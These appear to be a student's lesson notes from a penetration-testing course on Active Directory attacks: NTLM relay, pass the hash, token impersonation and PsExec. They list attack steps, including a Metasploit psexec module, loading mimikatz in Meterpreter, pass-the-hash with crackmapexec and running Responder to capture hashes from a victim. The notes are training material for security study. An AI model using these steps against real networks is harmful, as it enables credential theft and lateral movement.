Week 9: NTLM
NTLM Relay, Token Impersonation, Pass the Hash, PsExec, and more
Last updated
NTLM Relay, Token Impersonation, Pass the Hash, PsExec, and more
Last updated
Active Directory Exploitation - This lesson focuses on the recognition of vulnerabilities and exploitation tactics in an internal Active Directory environment. Attacks that will be introduced include: LLMNR poisoning/hash cracking, SMB hash relaying, pass the hash, token impersonation, kerberoasting, GPP/c-password attacks, and PowerShell attacks. More attacks will likely be added as the lesson is written, but the most common have been provided.
install crackmapexec
msf5 > use exploit/windows/smb/psexec
try all the target options for psexec: set target 3
Automatic
Powershell
Native Upload
MOF upload
sysinfo
x64 Architecture but 32-bit Meterpreter
you can look through payloads and find a better one sometime
In meterpreter shell, type load and hit tab twice to see all the different things to load, e.g. kiwi, mimikatz
Process Migration, get a x64 Meterpreter shell
Local Administrator account could be the same across many computers if IT images them from the same base image.
You can pass the hash with crackmapexec -H or with psexec
If communications are not digitally signed, you can NTLM relay. SMB signing is defaulted OFF.
Heath demonstrates environment were a user has administrative privileges on multiple machines.
Edited Responder.conf: Turned off SMB and HTTP server
Start Responder.py -I eth0 -rdw
Wait
point a victim machine to yours to in File Explorer e.g. \\192.168.202.173
